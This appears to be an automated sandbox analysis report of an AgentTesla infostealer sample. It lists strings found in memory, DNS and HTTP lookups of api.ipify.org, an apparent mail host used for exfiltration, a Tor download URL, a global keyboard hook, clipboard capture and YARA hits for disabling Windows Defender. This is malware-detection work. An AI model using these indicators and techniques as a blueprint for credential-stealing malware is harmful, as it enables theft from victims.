              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdH-u
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdf
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comml-Y
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coms-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/d
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm2
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;-
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H-u
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y001
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deeg
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
              Source: nrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://OPBeIPZ8XbJqLOvY6X.net
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
